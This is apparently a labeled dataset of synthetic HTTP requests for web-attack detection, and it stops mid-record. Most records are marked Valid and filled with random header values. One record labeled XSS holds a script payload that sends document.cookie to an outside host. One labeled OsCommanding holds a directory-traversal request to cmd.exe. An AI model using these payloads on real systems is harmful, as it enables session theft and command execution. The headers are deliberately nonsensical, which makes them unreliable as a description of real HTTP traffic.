Referer: /qei2rjc/nblbe/CtuAny2f.php
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/6.7 (compatible; olWi; Unix; seBhmn)
UA-CPU: Sparc
UA-Disp: 2081,476,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4860x424
Via: FTP/4.8 184.170.43.223
Transfer-Encoding: ecfsyt; leooelck=2arcGdU
Upgrade: ibt/1.0, mcs0et/8.8, uset/8.9, R7a/2.5
Warning: 049 www.oEI89of.png "InsghqcrnEttcefno" "Sat, 06 Mar 04 07:11:19 UTC"
X-Forwarded-For: 54.10.214.243
X-Serial-Number: 71957395002
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wnfLnvstuiblp=a1X.oMXFhq-

End - Id: 33832
Start - Id: 26980
class: Valid
GET /u3yuZngyad7@h/5ctx1Ply7lepvTqb.jpeg?taamo2hLyEW=8166437&sy0li=79&eDebh=43494&esat=rplimnuase&teco80g=eh&nrtenc=ecX%24%5BhIconnect&b7.dnph-id@xjh=9muaefrnot&evmu=7 HTTP/1.1
Host: www.nrEp.st:5
Connection: usTgrssa
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: cpsk-qt7tc;q=0.2, tc80tt-o75Utit
Cache-Control: only-if-cached
Client-ip: 128.148.23.146
Cookie: hooM7=I LoizaAa +g=ldSoo;asnvN0n6ttsjrh=s3OdeIympm;oscdiodd5Tt=(%ie2
Cookie2: $Version="6"
Date: Wed, 28 Oct 09 07:07:39 CET
ETag: W/"ZRNduEirGmna_BUVr"
Expect: ei1a
From: eanp0se@1atltaa.biz
If-Modified-Since: Mon, 22 Feb 10 13:58:41 GMT
If-Unmodified-Since: Fri, 29 Jan 10 14:22:14 GMT
If-Match: "M0QsBbLnB6zW2p1@Y"
If-None-Match: *
If-Range: Thu, 23 Apr 09 21:25:11 CET
Max-Forwards: 3014
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest uri=/biqENYth/edeooS/chbcKuvl/4rinantn.jsp
Authorization: rfhn sOrrlnn=naksC
Range: 5-,0419-,7123-1341
Referer: http://www.esj30evT.net/lOfsa/kpfspe/2ypdrtt.tar.gz
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: eiearnoeat (rbw0d_; t6Od1nqd9; iDR7yiEPI)
UA-CPU: Sparc
UA-Disp: 181,245,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6860x985
Via: 5.5 58.242.170.132, HTTP/3.6 www.emEeoaNy.gif
Transfer-Encoding: gzip
Upgrade: caeth/1.6, lnOnre/5.4, bKelfr/1.3
Warning: 634 119.210.230.98 "Etrefi" "Thu, 26 Oct 06 17:47:14 CET"
X-Forwarded-For: 158.178.215.164
X-Serial-Number: 781010344531
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26980
Start - Id: 3594
class: Valid
GET /iLOjUaxuYovjjzzV8Yz5/ceicmeienieatngLelI/4qfVL3AaevallibL/X4McatM/oi4iwesesbewtaimda8h/tEtD3KuGHsE13_pxa/ai2efinBS3tlttnu/.i7h4h.vv.echoR@n/ehtoBxtaeconmhnbo/eg5umMA_T6/tn/eWxchW@bABa.n.exe?sbvbscriptP=uyd&nwmhaolliVs=object&4foDaohRqeihrg=hpcm&layw=7436400&vrdG0oHhEerid2i=045552098 HTTP/1.0
Host: 13.147.12.84:92
Connection: close
Accept: */*
Accept-Charset: isiri-3342;q=0.4, iso-8859-3;q=0.9, x-mac-chinesesimp;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 126.175.186.119
Cookie: e8ledpubea=uohmsAbu8osnv;ysiodlstcnhtrh=fGI;ajaeasex=In4;slnc=6s+w 4o
Cookie2: $Version="475"
Date: Sat, 03 Apr 04 21:29:05 CET
ETag: W/"ck_Jw62CsGeOI7b"
Expect: sMwaah
From: izCq@ns1arneDin.cz
If-Modified-Since: Sat, 03 Dec 05 22:04:52 CET
If-Unmodified-Since: Sat, 01 Nov 08 06:48:14 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 20 Jun 04 11:11:15 GMT
Max-Forwards: 1
MIME-Version: 5.0
Pragma: cotk='bre'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM Y3VvdGRpbzRzZW1lZGV2amt3Wm9EZHRsNHNjczRobFV0aXRlbW85ZWhpaGV3
Range: 6-1887,1626-701918
Referer: http://www.isxribe.biz/7jre/tetEe2.nsf
TE: chunked;q=0.6,trailers
Trailer: If-Range
User-Agent: Mozilla/7.8 (compatible; Konqueror/8.5; Open BSD i586; todstCSd; OcrHit)
UA-CPU: MIPS
UA-Disp: 8239,236,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9506x752
Via: 6.8 134.255.79.145, 0.7 128.57.173.107:8153, 7.6 41.72.184.141
Transfer-Encoding: identity
Upgrade: aHnnn/4.7, e0Tge/7.4
Warning: 502 www.deutlFai.htm "sdoAadanidclexcd" "Sun, 24 Jan 10 15:55:45 CET"
X-Forwarded-For: 35.71.57.22
X-Serial-Number: 399935744
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3594
Start - Id: 33932
class: Valid
PUT /sfqklmtas8neg/uUSwp9L/iceg/YCcTtinsostrgots1/iGx@c/qtatBn9rdnlpnkt/etlmcdS/oshtcddt26E/x@ILDotP@ZL3fwBcEdni/treoftetclttde.mspx? HTTP/1.1
Content-Length: 284
Content-Language: ysJs,wgtol
Content-Encoding: identity
Content-Location: /oeah.msf
Content-MD5: ZHI5cWExbmJUdFNkd3BzZg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 14 Dec 09 15:25:40 UTC
Last-Modified: Sun, 20 Nov 05 05:54:59 UTC
Host: 155.41.135.88
Connection: pllei3or
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, deflate
Accept-Language: caFtveo-su
Cache-Control: no-store
Client-ip: 209.129.239.30
Cookie: ctt=rpne5s1d1ait;ohbnTeo=hth
Cookie2: $Version="772"
Date: Sat, 03 Oct 09 23:37:22 CET
ETag: "OXFSextK3FfDi7h"
Expect: 3nuns=nmsaTs7;neaar=t9lmoza
From: faUspl3@yqiAa4o.it
If-Modified-Since: Wed, 21 May 08 13:15:15 CET
If-Unmodified-Since: Thu, 20 Jan 05 06:38:57 UTC
If-Match: *
If-None-Match: *
If-Range: "xJ3d0rUbNeCvJMC"
Max-Forwards: 924
MIME-Version: 7.8
Pragma: 9roidQa=sgxNehfn
Proxy-Authorization: ddre3t eDfhi=ueIeutii
Authorization: Basic YUtuc2k6bGxlbg==
Range: -996,858-589875
Referer: http://io9Amip.com/s1nE0sT/enaisssp/ettnoh/NsbtCcnd/suaohd.cfm
TE: gzip;q=0.0,gzip;q=0.1,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.8 (Machintosh; U; PPC Mac OS X 8.1; tr-eA; rv:5.6.1) Gecko/42072010
UA-CPU: x86
UA-Disp: 4653,644,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 638x6278
Via: 8.0 www.8doena8.shtml:73025, naE9/3.2 39.158.248.127
Transfer-Encoding: identity
Upgrade: mtiv/1.9, Samgmt/6.9, enjtl/7.4
Warning: 993 www.i9tntii7.htm "dhencma" "Sun, 13 Jun 04 16:37:04 GMT"
X-Forwarded-For: 7.63.26.112
X-Serial-Number: 33317815178377
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

2NexecR=heC1U5jeB1r9&stdintu9i=98&isamhD=servicessEladmin)swpassthruzcOmihtacces<masa&Ir7sum=Ep&pLcDO9@e=92896&ueho=childos?&zw3oi=yfIg&rttzi5fsudT=st gE7qetAndmailsr&TtM-sock_streamcHLui=Ty]grlnoconnecti&vroW=at &UfqAhImetanullUK=c&lp=esA5bsa&6re=4373027&whhnqeeawthl=7995315

End - Id: 33932
Start - Id: 30232
class: Valid
GET /trmtvTach5oyoee/nels.mspx?xzl8Eic.c=0423 HTTP/1.0
Host: 54.151.83.210
Connection: keep-alive
Accept: image/*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: min-fresh=10
Client-ip: 33.23.116.246
Cookie: iJzesLinoxos=Teformkte;oaccepte%uapassthru;tntds=k-ybiiSC;dtro7=0iWO0GFOCa;ogvaAe9Leos=teseydtgbw0zity;psnea=721555628;KLmnXLpsM=goU
Cookie2: $Version="0"
Date: Fri, 20 Feb 09 21:47:17 GMT
ETag: "kVwijeAcZzUzGU5mZYyZ"
Expect: 100-continue
From: OtuSewg@hqerotci.biz
If-Modified-Since: Tue, 18 May 04 11:02:27 GMT
If-Unmodified-Since: Sun, 27 Sep 09 09:48:14 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 12 Jan 06 16:44:22 GMT
Max-Forwards: 17
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: cauv rfTcyhia=lorfye
Authorization: Digest username="deilL"
Range: 346642-698,469-394,8-
Referer: /i33trgn/py4eems1/aeisudn.mpeg
TE: trailers,trailers,deflate
Trailer: Date
User-Agent: lyx9yz http://www.5Stcmsa.net
UA-CPU: Sparc
UA-Disp: 2135,180,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2607x1931
Via: FTP/6.2 www.raoauzL.jpeg
Transfer-Encoding: identity
Upgrade: rtW2/3.4, ohothc/2.6, cDbs/6.4, Evs/7.7
Warning: 579 185.81.167.241 "3i0d" "Wed, 17 Jan 07 24:46:17 CET"
X-Forwarded-For: 172.159.37.56
X-Serial-Number: 19194011026
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30232
Start - Id: 31461
class: Valid
GET /jeSlrTnyiio5aaohfif/Etareagu/6A67Yxk77UQ/fnipO42.cgi?yH8teneis1SI=zdV&sa=sca&xspah=iy2rnetcathnda&6uqns=llayOszdOs0wyannor&aa=nEclm0taa1cte7e&zsuf=9449038 HTTP/1.1
Host: 119.11.86.18:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: koi8-r;q=0.3, x-mac-korean;q=0.6, windows-1257
Accept-Encoding: 
Accept-Language: er-nhsd, u-rLHs;q=0.8
Cache-Control: max-age=1
Client-ip: 117.25.5.120
Cookie: nrfht=%T9hstsusrrandocumentsseRko
Cookie2: $Version="82"
Date: Thu, 21 Jun 07 08:13:18 CET
ETag: "4fKlTwFk6MDrkfdK0"
Expect: 100-continue
From: 2u8ie@f9is.biz
If-Modified-Since: Tue, 25 May 04 14:31:00 CET
If-Unmodified-Since: Fri, 24 Feb 06 10:20:01 GMT
If-Match: *
If-None-Match: *
If-Range: "4yI6bBJ_kRZP4UdnGE"
Max-Forwards: 4852
MIME-Version: 2.0
Pragma: i5=r
Proxy-Authorization: Basic VHJhcm1ueGE6bmRlZDZsM3U=
Authorization: sGtenL aIphsla=rrkreGh5
Range: 024-703,-943,-1578
Referer: /paHme.msf
TE: trailers,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.9 (X11; U; Linux i386 5.7; tn-Bt; rv:4.8.6) Gecko/13765839
UA-CPU: Sparc
UA-Disp: 7523,3452,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 389x351
Via: 2.0 8.158.0.134
Transfer-Encoding: gzip
Upgrade: nru/5.8, ett/0.4, tbh9/3.1
Warning: 765 24.36.202.0 "ajeMEawyotisp" 
X-Forwarded-For: 187.213.56.17
X-Serial-Number: 1337403720563308
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 31461
Start - Id: 22418
class: Valid
GET /gdRzA/lttesWhmSee/rAXcBiu.js?dyiE=clIUPzwylz&UA_L=25719&tsruhmaesE=EhoweMtAxqahCm&hnia=oh6r4&Cgs1nS=77 HTTP/1.1
Host: www.a6aI.cz
Connection: close
Accept: audio/x-wav;q=0.3, video/mpeg;q=0.3
Accept-Charset: x-mac-arabic;q=0.2, windows-874, us-ascii, x-mac-ce;q=0.0
Accept-Encoding: 
Accept-Language: he-waqw;q=0.4, nnhel-edee3tao
Cache-Control: only-if-cached
Client-ip: 98.49.103.36
Cookie: Czy_U=m;eIad9nats0eas=cq-Vm6-uf1.K
Cookie2: $Version="02"
Date: Sun, 08 Apr 07 16:37:10 GMT
ETag: W/"6TvwSmuDLmRJ-V-EJ"
Expect: ld5e=9opldz
From: 3aib@giJsx.uk
If-Modified-Since: Wed, 09 Mar 05 06:31:31 UTC
If-Unmodified-Since: Tue, 09 Nov 04 23:34:23 UTC
If-Match: "ZQ9Jr2SS2ly6n@Bsp"
If-None-Match: *
If-Range: Mon, 14 Nov 05 14:58:46 CET
Max-Forwards: 4854
MIME-Version: 5.6
Pragma: exhq='ti3hd'
Proxy-Authorization: NTLM c3NlOG5yZU50bWVIeWxuaWx4NWlldWFvaTFxZW5sYjZhVHI=
Authorization: NTLM dGphYWhBcmVlN3RraXRzMG1Fc2dlMmdpcnRlRWlxYTNzdXJyRnlp
Range: 3-,571966-803988,77865-92138
Referer: /dt6ec/3sp4/unicsa/Tacbisvn.php3
TE: trailers,deflate;q=0.2
Trailer: Referer
User-Agent: Mozilla/1.5 (X11; U; Open BSD i386 0.5; lo-ys; rv:5.3.5) Gecko/80243729
UA-CPU: x86
UA-Disp: 1777,9655,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 112x1566
Via: vnmb/0.6 www.an0b.jpg
Transfer-Encoding: er9a; izulheee=g8boe
Upgrade: ioit8a/2.3, ldiu/6.1, uEu/1.0, AH6/0.7
Warning: 736 www.eLwneah.shtml "l38ruhse" 
X-Forwarded-For: 112.96.205.75
X-Serial-Number: 935727491848892765
----: ----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 22418
Start - Id: 26420
class: Valid
GET /EJZOjnl/ynod/wUZ@z/dvLl1syifFR4TW/afo/rWT.gif?gnruitniolsnemn=r1eqauutwl&uf3seom3e=1179998&tipSekbEchn8rrs=avsipiuoeacfLl&7woy2oro9di=i1l0trorunreS-T&-ireplace2q0FN=9&dcymiawiot=d96pFTx%40-NHN&p8rkmsl=eeiptlrs+i&nyhTesicesy=9HVdWzj&phddssnej=6&nTtaeo7=77&aa3o4pnTyammiod=ealnsmzi9pyar7zrnz HTTP/1.0
Host: www.h9dm.st
Connection: close
Accept: */*;q=0.6
Accept-Charset: hz-gb-2312, iso-8859-8-i;q=0.4
Accept-Encoding: gzip;q=0.6, compress, gzip;q=0.3
Accept-Language: *
Cache-Control: no-store
Client-ip: 125.93.135.240
Cookie: oeoghthyrr=atSer;IqiframecW=t7CU1Gj
Cookie2: $Version="916"
Date: Sat, 08 Jul 06 11:41:55 UTC
ETag: W/"5M7diQOksLFhN79T"
Expect: 100-continue
From: 0vaorneD@ken7hhpNbe.st
If-Modified-Since: Sat, 05 Jul 08 08:41:05 CET
If-Unmodified-Since: Sat, 19 Nov 05 22:01:30 UTC
If-Match: "vD3JuDLbMaLpdeQ"
If-None-Match: "ep9dIftIi4hgU45QK1l"
If-Range: Sat, 01 Aug 09 23:45:20 GMT
Max-Forwards: 522
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="s7ab"
Authorization: NTLM dGgzYlJ1cjNoZnRlZXV3ZmVhc3RtbjRhcHNlb210YmJiOGlvdHRhcmU=
Range: 976674-,-469,33-19
Referer: /icctoRy/oiatsmdl.pl
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/0.1 (Machintosh; U; PPC Mac OS X 9.7; nn-tn; rv:8.1.7) Gecko/16317771
UA-CPU: StrongARM
UA-Disp: 0058,1440,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1670x4966
Via: 5.2 www.etaietm.html, aurois/6.9 19.237.24.148, HTTP/5.9 200.171.138.209
Transfer-Encoding: nexHi; klk2c=iaae
Upgrade: lwmdc/2.7, Het/5.1
Warning: 710 www.ehhtaa.js "saamq" "Sun, 18 May 08 10:22:40 CET"
X-Forwarded-For: 59.157.184.124
X-Serial-Number: 3166594195
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26420
Start - Id: 23559
class: Valid
GET /cTlrcd/aI/jatnorem7aeca1w/S@9/RwhahOi0gdcrAeoo0/b@OUBHwUvi9/iid4Ssystem_6.M/fjmrpln0etcx1hktsi/wIezkgjnkeddzvq3/tbmu.png?inosrglriiu=3&1H8Yn5Ex=yeNzeuevnl&lE=%3Dobee&sneratseton=rtMpan&wuIa4nse9hVg=2189&RjphpWtelnet1v7Mw=w0iny&0o@logXYL=509605&Z_tRYGIWf8B=objectR%7Es HTTP/1.0
Host: 141.5.219.250
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: identity, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 32.209.56.123
Cookie: 9B-M=5138469573;oehsr7issOrs1to=eal5 ;sededfyrto=28;ote0grdeMn=7827957;lerka=nirrd
Cookie2: $Version="42"
Date: Mon, 10 Nov 08 09:03:02 UTC
ETag: ".C0E33fXGDKq97j_pZ-Q"
Expect: rymdnp4s=m3he;caao=roae6o
From: dlrken@iluelhlan.cz
If-Modified-Since: Mon, 20 Oct 08 03:00:53 UTC
If-Unmodified-Since: Sat, 11 Apr 09 19:39:01 CET
If-Match: "wQk3VeZanO4wfr9XKH7"
If-None-Match: "COWl@@tcLmaG0xQ"
If-Range: Tue, 02 Mar 10 15:16:37 GMT
Max-Forwards: 542
MIME-Version: 2.1
Pragma: trtn=aexez
Proxy-Authorization: Basic dHJhSTppdDRkQWloaQ==
Authorization: NTLM cnI4aUx6b3ppbmZ0Mm9hYnNmaGc3Ym90aGllaW5vZWFlMGh5OXBlZWFsbjN0
Range: 9-582047,9-,23678-00
Referer: /etonogti/nt8et/tarf7.css
TE: chunked;q=0.0,trailers,chunked;q=0.0
Trailer: Referer
User-Agent: Mozilla/9.1 (compatible; MSIE 9.9; Unix; lsynt1; muuo1; tirt)
UA-CPU: StrongARM
UA-Disp: 990,4504,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 4426x0282
Via: rhni/7.2 26.3.59.1, FTP/5.9 42.20.19.234
Transfer-Encoding: gzip
Upgrade: wsepm/7.5, 5aaet/0.7, No5jm/7.8, gbfr/4.3
Warning: 209 www.5t5s6.png "thwt9satrcduouI" "Wed, 18 Mar 09 14:43:45 CET"
X-Forwarded-For: 11.102.20.4
X-Serial-Number: 1009110184973666911
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 23559
Start - Id: 47250
class: XSS
GET /e0niecAfinr.gif?Iudtssn=%5B%5CxC0%5D%5B%5CxBC%5Dscript+++%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.laisch.com%2Fcgi-bin%2Ficasnira.cgi%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript++++%3E&dKx..llN=shn1r9oquotFnseeo&kn=xati&mhseT1lseIptt3=0ahtpassieetalst%3Ee%29zq&jc=tp&enraeesJaihr7Lp=n82Uoy3MfYZp&tbEoysoimt=l7&7Mvor=cOlEorr%28+t%3Ae HTTP/1.0
Host: www.earknem8.fr
Connection: lohs
Accept: */*;q=0.8
Accept-Charset: iso-8859-3
Accept-Encoding: 
Accept-Language: sj-y6;q=0.9, drwea-mr;q=0.6
Cache-Control: no-cache
Client-ip: 19.118.218.108
Cookie: mtuT2wrtterto=ie
Cookie2: $Version="66"
Date: Sun, 02 Apr 06 08:01:53 GMT
ETag: "WAB5@Z.yDarnU0JFvhk"
Expect: 100-continue
From: mP8eatM@krgt.fr
If-Modified-Since: Tue, 24 Nov 09 19:24:42 CET
If-Unmodified-Since: Wed, 20 Oct 04 16:03:54 UTC
If-Match: "xyYZ28-yPIyeKjhST4-"
If-None-Match: *
If-Range: "p3.BQaZCl7N6PhYI"
Max-Forwards: 57
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: Digest nonce
Range: -88
Referer: http://www.etod.org/hnacm.tiff
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: o7jYnjlrKt http://www.sae0.com
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 077x3740
Via: 8.8 124.244.194.141
Transfer-Encoding: compress
Upgrade: ebpgud/5.5, uo6ys/3.0, eeei/3.0, wOU/7.9
Warning: 231 178.152.9.49 "iem9a" "Sat, 05 Jul 08 14:59:50 GMT"
X-Forwarded-For: 29.33.63.135
X-Serial-Number: 15152704800
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47250
Start - Id: 9164
class: Valid
GET /rTmL0pX9wO/Xx@uZpZqwindow.openJxBu/MDUgDcopy2trvFscript/bR9/hsd/gp5YEcIqEIc.php3?uc1ielsrn=cEh%7E%7Cdtopennsigroup+by HTTP/1.0
Host: www.leswoord.st
Connection: close
Accept: */*
Accept-Charset: euc-tw, iso-8859-9, euc-kr, cp-932;q=0.6, koi8-r;q=0.7
Accept-Encoding: gzip;q=0.6, compress;q=0.3, identity
Accept-Language: 5et1bns-mae;q=0.9, H6lxoea-hiHTy6yk;q=0.9, rueuhgk-huTslabi
Cache-Control: max-age=0
Client-ip: 84.14.220.208
Cookie: _VUyZQopenXv@f=sr2ptrizie9a;nr8SUX8_img=76579;nlyfapayeejY=493;ao9onasduap= $bqh
Cookie2: $Version="237"
Date: Sat, 25 Jun 05 04:04:11 CET
ETag: W/"-fmhV-@Ije5xJ9oFP"
Expect: 100-continue
From: fwtTde@tnn0ld58.biz
If-Modified-Since: Tue, 10 Feb 04 02:08:18 UTC
If-Unmodified-Since: Mon, 07 Aug 06 16:46:00 CET
If-Match: "op_SLdSNz7XIiGI"
If-None-Match: "KJ12EcHxqcZxR4i"
If-Range: *
Max-Forwards: 9570
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: ktOzu w5Tane=sisl
Authorization: ccien ezres=wwlen
Range: -7586
Referer: http://www.oury.gov/oerhan.jsp
TE: trailers
Trailer: Connection
User-Agent: sysn8aatae (oPAcr.Ii6D; abs8BDX; 73FO4FI; ybopWTR-wt)
UA-CPU: MIPS
UA-Disp: 226,033,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 001x9335
Via: 9.0 97.174.222.66, 9.3 200.45.110.139:96, 0.5 24.229.194.210
Transfer-Encoding: identity
Upgrade: mapEt/8.1, RNae/5.1
Warning: 905 www.dgfeerSr.html:96082 "t0ewrycrethaeHou7" "Thu, 31 Mar 05 07:13:11 GMT"
X-Forwarded-For: 189.85.16.83
X-Serial-Number: 3795859892
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9164
Start - Id: 25928
class: Valid
GET /TkrupdatetaQX4/hoTGUvN@xSpE.h.28.tiff?5lifoewpotr3=10697537&UuAM.oSR_RVopt=23 HTTP/1.0
Host: 180.164.86.191
Connection: close
Accept: audio/*;q=0.4
Accept-Charset: windows-1258, x-mac-arabic;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 151.64.233.90
Cookie: hwtFNeril3ts6=ulzaoalcete;rjeEl=UlrabdmIinnrwqcm;hhesonat=04Avoeteuehdblsdog
Cookie2: $Version="6"
Date: Thu, 06 Mar 08 01:46:34 UTC
ETag: "ZrLxJWW4Lfsbyxp1kd"
Expect: liatar=9ett
From: pOyls@mejt.gov
If-Modified-Since: Mon, 01 Jan 07 20:27:01 UTC
If-Unmodified-Since: Wed, 27 Jun 07 10:39:21 UTC
If-Match: *
If-None-Match: "3wtyaVFrABLiNhi"
If-Range: Tue, 02 Jan 07 01:20:09 CET
Max-Forwards: 9
MIME-Version: 7.8
Pragma: s='hrsrul'
Proxy-Authorization: Basic cm1lYTpvZWVoQQ==
Authorization: ahtwme 2fda=jhaaQ
Range: -1909,0060-494,6-
Referer: /Dyytwts/9epnpd.asmx
TE: trailers,trailers,chunked
Trailer: Host
User-Agent: Ve4soscd0n (s7kUoNt)
UA-CPU: StrongARM
UA-Disp: 9734,8535,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 5187x1770
Via: 1.6 www.inreC.gif, HTTP/6.7 www.nOsho.shtml
Transfer-Encoding: identity
Upgrade: L5mEt/8.6, onmhis/9.1, yacc0v/3.3
Warning: 600 www.rong.jpeg "ecdetwej" "Mon, 19 May 08 07:00:07 UTC"
X-Forwarded-For: 177.96.24.239
X-Serial-Number: 1807971586692
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 25928
Start - Id: 44345
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.apndS.ch:61124
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic;q=0.9, x-mac-chinesetrad, x-mac-arabic;q=0.1
Accept-Encoding: gzip;q=0.2
Accept-Language: hnl-so2;q=0.2, L-roniZl;q=0.1
Cache-Control: only-if-cached
Client-ip: 26.48.188.250
Cookie: eoencoxteaYre=douj;7ciso9onq73tno=90783647
Cookie2: $Version="89"
Date: Sat, 31 Jan 09 12:37:30 UTC
ETag: "nTSEc@7ERM9WccIu9IhT"
Expect: 100-continue
From: reco@dgiEee.cz
If-Modified-Since: Thu, 10 Mar 05 21:55:40 UTC
If-Unmodified-Since: Thu, 05 Jul 07 03:45:43 GMT
If-Match: "K5p5zjQs5Xru@bq"
If-None-Match: *
If-Range: Sat, 13 Mar 10 05:58:32 UTC
Max-Forwards: 81
MIME-Version: 5.3
Pragma: Eiilnn='tisHs'
Proxy-Authorization: Digest nc=e078eCD8
Authorization: a9cb rpta8oc=nteya
Range: 8613-7,823162-28,06138-
Referer: /aneqlxc/tfIsY.html
TE: gzip,gzip
Trailer: Max-Forwards
User-Agent: Mozilla/8.4 (X11; U; Open BSD i586 4.3; nn-7u; rv:1.4.3) Gecko/74665320
UA-CPU: x86
UA-Disp: 5843,217,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 673x399
Via: 6.3 154.254.103.28
Transfer-Encoding: deflate
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 450 137.33.40.57 "ymhep" "Sat, 27 May 06 20:03:51 UTC"
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7714827508800
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44345
Start - Id: 21695
class: Valid
GET /ntt/t4SPb6c9/WmXRmFGZZQ/iHndgUng@/bpIgCV/VZ9PfU.php?enaaxeAqrinxcde=rc1e&tut=Sf%2Flsi&TtatHiRxlfr2sP=s7.L1UldzUg&OahikC7mtp=rF_jkGKV&taoneddum=ussan2t&oiuaatbE=hq%40YzUc&hea5y7ynhnseatx=m3etle&st=rqeg0Yyp4&98Y6aF5=69&mzxUtNd=04932837&aarbahneGsiiaAt=nedSnh4i HTTP/1.0
Host: www.f0asks.be
Connection: keep-alive
Accept: image/jpeg;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=229
Client-ip: 19.23.184.246
Cookie: nfZJAS=ugAaN3iBha7ZlmiM;bc=aeeo>c8htacces;fe9slN1ah0=8336207675;c6tnI5besoi=?o5
Cookie2: $Version="9"
Date: Mon, 01 Dec 08 12:59:45 CET
ETag: W/"Dv1uMP8Hv4QitlIlBLDW"
Expect: aoSe=shro;Anls43no=Tmghoa
From: fhnah0@pcVodthnoa.com
If-Modified-Since: Sat, 05 Nov 05 02:06:27 UTC
If-Unmodified-Since: Mon, 03 May 04 08:35:15 CET
If-Match: "@slnfGhoht-bB.966r"
If-None-Match: *
If-Range: *
Max-Forwards: 99
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: zlkAcr cnfcci=ifhphtEe
Authorization: Basic bmxsb286bmd5cmRvbzg=
Range: 6854-805189,4305-14775
Referer: /lehmArro/or2R67Fe/seta9i/seaal/2j0smsh.jpeg
TE: trailers,trailers
Trailer: Via
User-Agent: oIyuoileNcKFeign
UA-CPU: StrongARM
UA-Disp: 299,773,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 664x378
Via: 1.9 167.17.97.162, sSuQ6n/9.0 www.8lqaD.gif
Transfer-Encoding: tnle; a6tla=itasaaj
Upgrade: Abae/9.2, 23ehie/8.6, esDl/9.5, y7tfvd/4.7, aiC/7.6
Warning: 456 16.111.210.179 "htasayeJyno" "Fri, 12 Nov 04 12:32:53 CET"
X-Forwarded-For: 36.156.86.13
X-Serial-Number: 07885
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21695
Start - Id: 8284
class: Valid
GET /lebthrGgtahtetnvI/ibfI2uXP-b@1/tskedeoec4wylt/speI2GHii7WUzjq7We/woriRjbzsY/l3zIsamurXB-/tP3H394oyT-ij/l6v3.css?dnedattt1enohv=eTA5b&CIDY1D=adeuyn%7Ceb%2Fwh%293&6zseL3a=%3Cn&eae=nztZhC90ji-&ui2qtsetts1lik=ny4&wZls9al1jykEeR=15&eijoRE=aX5&hCscriptx5x6b8QV=639907&ue=elinkxUnEl+%24ka+gRm&iq=67731350&zsey9feyoe8ug=tZlp5guG.&mqfIjmriina2m1e=73&LBuBbWtN=18250752 HTTP/1.1
Host: 244.39.234.214
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: 6='wcno'
